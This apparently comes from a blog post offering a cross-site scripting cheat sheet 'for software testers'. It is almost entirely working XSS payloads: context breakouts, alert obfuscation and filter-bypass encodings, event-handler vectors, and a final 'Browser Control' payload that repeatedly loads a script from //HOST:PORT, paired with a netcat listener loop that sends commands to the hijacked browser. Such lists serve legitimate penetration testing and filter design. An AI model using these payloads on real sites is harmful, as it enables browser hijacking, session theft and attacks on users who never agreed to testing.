XSS Cheat Sheet

XSS cheat sheet
Reading Time: 2 minutes

Based on OWASP, Cross-site Scripting (XSS) is one of the most dangerous type of attacks. Web applications that allow users to store data are potentially exposed to this type of attack. Therefore, an XSS cheat sheet containing basic and advanced exploits for XSS can come in handy to any software tester. Bellow I have gathered different types of XSS exploits with examples.

XSS Cheat Sheet

Technique Vector or Payload
HTML Context Tag Injection <svg onload=alert(1)>
“><svg onload=alert(1)//
HTML Context Inline Injection “onmouseover=alert(1)//
“autofocus/onfocus=alert(1)//
Javascript Context Code Injection ‘-alert(1)-‘
‘-alert(1)//
Javascript Context Code Injection (escaping the escape) \’-alert(1)//
Javascript Context Tag Injection </script><svg onload=alert(1)>
PHP_SELF Injection http://DOMAIN/PAGE.php/”><svg onload=alert(1)>
Without Parenthesis <svg onload=alert1>
<svg onload=alert&lpar;1&rpar;>
<svg onload=alert&#x28;1&#x29>
<svg onload=alert&#40;1&#41>
Filter Bypass Alert Obfuscation (alert)(1)
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[‘al\x65rt’](1)
top[8680439..toString(30)](1)
Body Tag  <body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)
Miscellaneous Vectors  <marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!
 Filter Bypass Generic Tag + Handler  

Encoding Mixed Case Spacers
%3Cx onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1
<X onxxx=1
<x OnXxx=1
<X OnXxx=1

Doubling
<x onxxx=1 onxxx=1

<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1
Quotes Stripping Mimetism
<x 1=’1’onxxx=1
<x 1=”1″onxxx=1
<[S]x onx[S]xx=1

[S] = stripped char or string

<x </onxxx=1
<x 1=”>” onxxx=1
<http://onxxx%3D1/
 Generic Source Breaking  <x onxxx=alert(1) 1=’
 Browser Control  <svg onload=setInterval(function(){with(document)body.
appendChild(createElement(‘script’)).src=’//HOST:PORT’},0)>

$ while :; do printf “j$ “; read c; echo $c | nc -lp PORT >/dev/null; done

Be the first to comment

Leave a Reply

Your email address will not be published.


*